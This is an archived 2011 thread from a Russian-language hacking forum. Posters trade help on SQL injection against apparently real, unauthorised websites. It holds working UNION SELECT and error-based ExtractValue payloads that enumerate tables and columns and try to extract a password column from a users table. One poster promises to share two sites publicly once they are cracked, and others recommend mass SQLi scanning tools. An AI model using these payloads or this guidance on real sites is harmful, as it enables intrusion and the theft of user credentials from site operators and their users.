ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

02.11.2011, 20:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 43818
Репутация:
0
|
|
сделал @@version() вышло 5.1.41-3ubuntu12.10
кто-нибудь сталкивался с таким? какие дальнейшие действия?
|
|
|
|

02.11.2011, 20:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 40748
Репутация:
78
|
|
Сообщение от crackforme
crackforme said:
сделал @@version() вышло 5.1.41-3ubuntu12.10
кто-нибудь сталкивался с таким? какие дальнейшие действия?
Ну крути дальше.
Фильтруется либо @ либо ( и ), это как повезет.
Проверь @@version, если получишь результат тот же что и @@version(), то фильтруется скобки. Очевидно же.
|
|
|
|

03.11.2011, 03:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 7046
Репутация:
1
|
|
Прошу помощи
инъекция вида:
index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,
ответ:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
И далее плохая новость ничего не выходит с числами, сколько бы не подставлял.
Но есть и хорошая
index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0'
в конце кавычка и ответ уже:
Invalid query: The used SELECT statements have a different number of columns
Только вот теперь опять затык. Два сайта если вскроем на общее пользование вынесу.
+ сайт с xss есть но об этом позже =)
если что сайт на Apache/2.2.17
|
|
|
|

03.11.2011, 04:12
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
ссылку покажи
|
|
|

03.11.2011, 13:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 12399
Репутация:
-2
|
|
Может немного не в той теме. Хотел узнать:
Какая программа проверяет ссылки на наличие скули, но не интересуют программы, которые просто ищут ошибку при подстановке " ' ".
Нужно нечто вроде sqlmap, но способная брать список из файла и не требующая никакого ввода от пользователя (скорость работы не особо важна, главное - качество :3)
Также устроит, если кто-нибудь подскажет как можно это осуществить через sqlmap
|
|
|
|

03.11.2011, 13:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 60692
Репутация:
6
|
|
NetDevilz SQL Scanner в гугл пропиши
|
|
|
|

03.11.2011, 14:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 2918
Репутация:
0
|
|
Blind SQL Injection
Добрый день уважаемые форумчане.
Помогите разобраться в чем проблема, замучился уже.
Суть проблемы:
Дергаю названия таблиц так:
Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+table_name+from+INFORMATION_SCHEMA.tables+LIMIT+0,1)))--
Такой вид потому что прямого вывода на страницу нету, да и ошибки отображаются только в исходном коде страницы.
Пошел дальше, получил списки всех таблиц.
одна из них users
Получаю название колонок:
Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+column_name+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT+0,1)))--
Получил все нормально.
Теперь надо выдернуть значения.
Делаю так:
Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+pass+from+users+LIMIT+0,1)))--
В ответ получаю:
Код:
Code:
mysql error: Unknown column 'pass' in 'field list'
Вопрос, почему говорит что нет такой колонки когда при переборе колонок в таблице users показало что есть pass?
ЗЫ в это таблице есть еще несколько колонок, одна из них name, ее видит нормально, а все остальные не видит.
|
|
|
|

03.11.2011, 14:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 60692
Репутация:
6
|
|
Мб захексишь?
|
|
|
|

03.11.2011, 14:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 2918
Репутация:
0
|
|
Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+UNHEX(HEX(pass))+from+users+LIMIT+0,1)))--
Выдает:
Код:
Code:
mysql error: Unknown column 'pass' in 'field list'
|
|
|
|

03.11.2011, 15:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 40748
Репутация:
78
|
|
Попробуй указать базу данных этой таблицы.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|